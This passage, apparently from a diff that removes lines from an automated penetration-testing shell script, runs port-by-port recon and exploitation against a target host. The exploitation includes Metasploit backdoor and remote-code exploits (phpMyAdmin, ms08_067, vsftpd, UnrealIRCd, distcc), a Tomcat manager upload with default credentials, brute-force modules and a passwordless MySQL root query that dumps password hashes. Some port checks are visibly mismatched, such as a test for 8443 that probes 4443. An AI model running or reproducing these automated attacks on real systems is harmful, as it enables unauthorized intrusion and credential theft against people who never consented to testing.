$TARGET...$RESET $OKORANGE" - curl -s --insecure -I https://$TARGET | egrep -i "Server:|X-Powered|ASP|JSP|PHP|.NET" | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking if Strict-Transport-Security is enabled on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I https://$TARGET/ | egrep -i "Strict-Transport-Security" | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking for Flash cross-domain policy on $TARGET...$RESET $OKORANGE" - curl -s --insecure https://$TARGET/crossdomain.xml | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking for Silverlight cross-domain policy on $TARGET...$RESET $OKORANGE" - curl -s --insecure https://$TARGET/clientaccesspolicy.xml | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking for HTML5 cross-origin resource sharing on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I https://$TARGET | egrep -i "Access-Control-Allow-Origin" | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Retrieving robots.txt on $TARGET...$RESET $OKORANGE" - curl -s --insecure https://$TARGET/robots.txt | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Retrieving sitemap.xml on $TARGET...$RESET $OKORANGE" - curl -s --insecure https://$TARGET/sitemap.xml | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking cookie attributes on $TARGET...$RESET $OKORANGE" - curl -s --insecure -I https://$TARGET | egrep -i "Cookie:" | tail -n 10 - echo "" - echo -e "$OKBLUE+ -- --=[Checking for ASP.NET Detailed Errors on $TARGET...$RESET $OKORANGE" - curl -s --insecure https://$TARGET/%3f.jsp | egrep -i 'Error|Exception' | tail -n 10 - curl -s --insecure https://$TARGET/test.aspx -L | egrep -i 'Error|Exception|System.Web.' | tail -n 10 - echo "" - echo -e "$RESET" - echo -e "$OKGREEN + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +$RESET" - nikto -h https://$TARGET - echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET" - cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg - echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port443.jpg" - - if [ "$MODE" = "web" ]; - then - echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET" - nmap -A -sV -T5 -p 443 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal - echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET" - dirb https://$TARGET - echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET" - wpscan --url https://$TARGET --batch - echo "" - wpscan --url https://$TARGET/wordpress/ --batch - echo -e "$OKGREEN + -- ----------------------------=[Running CMSMap]=-------------------------- -- +$RESET" - python $CMSMAP -t https://$TARGET - echo "" - python $CMSMAP -t https://$TARGET/wordpress/ - echo "" - if [ $ARACHNI == "1" ]; - then - echo -e "$OKGREEN + -- ----------------------------=[Skipping Arachni Scan]=------------------- -- +$RESET" - else - echo -e "$OKGREEN + -- ----------------------------=[Running Arachni Web Application Scan]=---- -- +$RESET" - mkdir -p $INSTALL_DIR/loot/web/$TARGET-https/ 2> /dev/null - arachni --report-save-path=$INSTALL_DIR/loot/web/$TARGET-https/ --output-only-positives https://$TARGET - cd $INSTALL_DIR/loot/web/$TARGET-https/ - arachni_reporter $INSTALL_DIR/loot/web/$TARGET-https/*.afr --report=html:outfile=$INSTALL_DIR/loot/web/$TARGET-https/arachni.zip - unzip $INSTALL_DIR/loot/web/$TARGET-https/arachni.zip - cd $INSTALL_DIR - fi - echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET" - sqlmap -u "https://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a - echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET" - msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;" - echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET" - python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 443 --ssl - fi - - if [ $SCAN_TYPE == "DOMAIN" ]; - then - if [ -z $GHDB ]; - then - echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=---------- -- +$RESET" - goohak $TARGET > /dev/null - echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=----------- -- +$RESET" - php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt - rm -Rf output/ cookie.txt exploits.conf - fi - fi -fi - -if [ -z "$port_445" ]; -then - echo -e "$OKRED + -- --=[Port 445 closed... skipping.$RESET" -elif [ $SMB = "1" ]; -then - echo -e "$OKRED + -- --=[Port 445 scanned... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 445 opened... running tests...$RESET" - enum4linux $TARGET - python $SAMRDUMP $TARGET - nbtscan $TARGET - nmap -A -sV -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET - msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;" -fi - -if [ -z "$port_512" ]; -then - echo -e "$OKRED + -- --=[Port 512 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 512 opened... running tests...$RESET" - nmap -A -sV -T5 -p 512 --script=rexec* $TARGET -fi - -if [ -z "$port_513" ] -then - echo -e "$OKRED + -- --=[Port 513 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 513 opened... running tests...$RESET" - nmap -A -sV -T5 -p 513 --script=rlogin* $TARGET -fi - -if [ -z "$port_514" ]; -then - echo -e "$OKRED + -- --=[Port 514 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 514 opened... running tests...$RESET" - amap $TARGET 514 -A -fi - -if [ -z "$port_1433" ]; -then - echo -e "$OKRED + -- --=[Port 1433 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 1433 opened... running tests...$RESET" - nmap -A -sV -T5 --script=mssql* -p 1433 $TARGET -fi - -if [ -z "$port_2049" ]; -then - echo -e "$OKRED + -- --=[Port 2049 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 2049 opened... running tests...$RESET" - nmap -A -sV -T5 --script=nfs* -p 2049 $TARGET - rpcinfo -p $TARGET - showmount -e $TARGET - smbclient -L $TARGET -U " "%" " -fi - -if [ -z "$port_2121" ]; -then - echo -e "$OKRED + -- --=[Port 2121 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 2121 opened... running tests...$RESET" - nmap -A -sV -T5 --script=ftp* -p 2121 $TARGET - msfconsole -x "setg PORT 2121; use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;" -fi - -if [ -z "$port_3306" ]; -then - echo -e "$OKRED + -- --=[Port 3306 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 3306 opened... running tests...$RESET" - nmap -A -sV --script=mysql* -p 3306 $TARGET - mysql -u root -h $TARGET -e 'SHOW DATABASES; SELECT Host,User,Password FROM mysql.user;' -fi - -if [ -z "$port_3310" ]; -then - echo -e "$OKRED + -- --=[Port 3310 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 3310 opened... running tests...$RESET" - nmap -A -p 3310 -T5 -sV --script clamav-exec $TARGET -fi - -if [ -z "$port_3128" ]; -then - echo -e "$OKRED + -- --=[Port 3128 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 3128 opened... running tests...$RESET" - nmap -A -p 3128 -T5 -sV --script=*proxy* $TARGET -fi - -if [ -z "$port_3389" ]; -then - echo -e "$OKRED + -- --=[Port 3389 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 3389 opened... running tests...$RESET" - nmap -A -sV -T5 --script=rdp-* -p 3389 $TARGET - rdesktop $TARGET & -fi - -if [ -z "$port_3632" ]; -then - echo -e "$OKRED + -- --=[Port 3632 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 3632 opened... running tests...$RESET" - nmap -A -sV -T5 --script=distcc-* -p 3632 $TARGET - msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;" -fi - -if [ -z "$port_8443" ]; -then - echo -e "$OKRED + -- --=[Port 4443 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 4443 opened... running tests...$RESET" - wafw00f http://$TARGET:4443 - echo "" - whatweb http://$TARGET:4443 - echo "" - xsstracer $TARGET 4443 - sslscan --no-failed $TARGET:4443 - sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:4443 - cd $PLUGINS_DIR/MassBleed - ./massbleed $TARGET port 4443 - cd $INSTALL_DIR - nikto -h https://$TARGET:4443 - cutycapt --url=https://$TARGET:4443 --out=$LOOT_DIR/screenshots/$TARGET-port4443.jpg - nmap -A -p 4443 -T5 --script=*proxy* $TARGET -fi - -if [ -z "$port_5432" ]; -then - echo -e "$OKRED + -- --=[Port 5432 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 5432 opened... running tests...$RESET" - nmap -A -sV --script=pgsql-brute -p 5432 $TARGET -fi - -if [ -z "$port_5800" ]; -then - echo -e "$OKRED + -- --=[Port 5800 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 5800 opened... running tests...$RESET" - nmap -A -sV -T5 --script=vnc* -p 5800 $TARGET -fi - -if [ -z "$port_5900" ]; -then - echo -e "$OKRED + -- --=[Port 5900 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 5900 opened... running tests...$RESET" - nmap -A -sV -T5 --script=vnc* -p 5900 $TARGET -fi - -if [ -z "$port_5984" ]; -then - echo -e "$OKRED + -- --=[Port 5984 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 5984 opened... running tests...$RESET" - nmap -A -sV -T5 --script=couchdb* -p 5984 $TARGET - msfconsole -x "use auxiliary/scanner/couchdb/couchdb_enum; set RHOST "$TARGET"; run; exit;" -fi - -if [ -z "$port_6000" ]; -then - echo -e "$OKRED + -- --=[Port 6000 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 6000 opened... running tests...$RESET" - nmap -A -sV -T5 --script=x11* -p 6000 $TARGET -fi - -if [ -z "$port_6667" ]; -then - echo -e "$OKRED + -- --=[Port 6667 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 6667 opened... running tests...$RESET" - nmap -A -sV -T5 --script=irc* -p 6667 $TARGET - msfconsole -x "use unix/irc/unreal_ircd_3281_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;" -fi - -if [ -z "$port_8000" ]; -then - echo -e "$OKRED + -- --=[Port 8000 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 8000 opened... running tests...$RESET" - wafw00f http://$TARGET:8000 - echo "" - whatweb http://$TARGET:8000 - echo "" - xsstracer $TARGET 8000 - cd .. - nikto -h http://$TARGET:8000 - cutycapt --url=http://$TARGET:8000 --out=$LOOT_DIR/screenshots/$TARGET-port8000.jpg -fi - -if [ -z "$port_8100" ]; -then - echo -e "$OKRED + -- --=[Port 8100 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 8100 opened... running tests...$RESET" - wafw00f http://$TARGET:8100 - echo "" - whatweb http://$TARGET:8100 - echo "" - xsstracer $TARGET 8100 - sslscan --no-failed $TARGET:8100 - cd $PLUGINS_DIR/MassBleed - ./massbleed $TARGET port 8100 - cd $INSTALL_DIR - nikto -h http://$TARGET:8100 - cutycapt --url=http://$TARGET:8100 --out=$LOOT_DIR/screenshots/$TARGET-port8100.jpg -fi - -if [ -z "$port_8080" ]; -then - echo -e "$OKRED + -- --=[Port 8080 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 8080 opened... running tests...$RESET" - wafw00f http://$TARGET:8080 - echo "" - whatweb http://$TARGET:8080 - echo "" - xsstracer $TARGET 8080 - sslscan --no-failed $TARGET:8080 - cd $PLUGINS_DIR/MassBleed - ./massbleed $TARGET port 8080 - cd $INSTALL_DIR - nikto -h http://$TARGET:8080 - cutycapt --url=http://$TARGET:8080 --out=$LOOT_DIR/screenshots/$TARGET-port8080.jpg - nmap -A -p 8080 -T5 --script=*proxy* $TARGET - msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;" - # EXPERIMENTAL - APACHE STRUTS RCE EXPLOIT - # msfconsole -x "use exploit/linux/http/apache_struts_rce_2016-3081; setg RHOSTS "$TARGET"; set PAYLOAD linux/x86/read_file; set PATH /etc/passwd; run;" -fi - -if [ -z "$port_8180" ]; -then - echo -e "$OKRED + -- --=[Port 8180 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 8180 opened... running tests...$RESET" - wafw00f http://$TARGET:8180 - echo "" - whatweb http://$TARGET:8180 - echo "" - xsstracer $TARGET 8180 - sslscan --no-failed $TARGET:8180 - sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:8180 - cd $PLUGINS_DIR/MassBleed - ./massbleed $TARGET port 8180 - cd $INSTALL_DIR - nikto -h http://$TARGET:8180 - cutycapt --url=http://$TARGET:8180 --out=$LOOT_DIR/screenshots/$TARGET-port8180.jpg - nmap -p 8180 -T5 --script=*proxy* $TARGET - echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET" - echo -e "$OKGREEN + -- ----------------------------=[Launching Tomcat Exploits]=--------------- -- +$RESET" - msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8180; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;" -fi - -if [ -z "$port_8443" ]; -then - echo -e "$OKRED + -- --=[Port 8443 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 8443 opened... running tests...$RESET" - wafw00f http://$TARGET:8443 - echo "" - whatweb http://$TARGET:8443 - echo "" - xsstracer $TARGET 8443 - sslscan --no-failed $TARGET:8443 - sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:8443 - cd $PLUGINS_DIR/MassBleed - ./massbleed $TARGET port 8443 - cd $INSTALL_DIR - nikto -h https://$TARGET:8443 - cutycapt --url=https://$TARGET:8443 --out=$LOOT_DIR/screenshots/$TARGET-port8443.jpg - nmap -A -p 8443 -T5 --script=*proxy* $TARGET -fi - -if [ -z "$port_8888" ]; -then - echo -e "$OKRED + -- --=[Port 8888 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 8888 opened... running tests...$RESET" - wafw00f http://$TARGET:8888 - echo "" - whatweb http://$TARGET:8888 - echo "" - xsstracer $TARGET 8888 - nikto -h http://$TARGET:8888 - cutycapt --url=https://$TARGET:8888 --out=$LOOT_DIR/screenshots/$TARGET-port8888.jpg -fi - -if [ -z "$port_10000" ]; -then - echo -e "$OKRED + -- --=[Port 10000 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 10000 opened... running tests...$RESET" - echo -e "$OKGREEN + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +$RESET" - echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET" - msfconsole -x "use auxiliary/admin/webmin/file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;" -fi - -if [ -z "$port_49152" ]; -then - echo -e "$OKRED + -- --=[Port 49152 closed... skipping.$RESET" -else - echo -e "$OKORANGE + -- --=[Port 49152 opened... running tests...$RESET" - $SUPER_MICRO_SCAN $TARGET -fi - -echo -e "$OKGREEN + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +$RESET" -cd $PLUGINS_DIR/yasuo -ruby yasuo.rb -r $TARGET -b all -cd $SNIPER_DIR - -if [ "$FULLNMAPSCAN" = "0" ]; then - echo -e "$OKGREEN + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +$RESET" -else - echo -e "$OKGREEN + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +$RESET" - nmap -T4 -sV -O -v -p 1-65355 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml -fi - -if [ "$AUTOBRUTE" = "0" ]; then - echo -e "$OKGREEN + -- ----------------------------=[Skipping Brute Force]=-------------------- -- +$RESET" -else - echo -e "$OKGREEN + -- ----------------------------=[Running Brute Force]=--------------------- -- +$RESET" - brutex $TARGET - cd $INSTALL_DIR - rm -f hydra.restore - rm -f scan.log - echo "" -fi - -rm -f $LOOT_DIR/.fuse_* 2> /dev/null - -echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET" -exit 0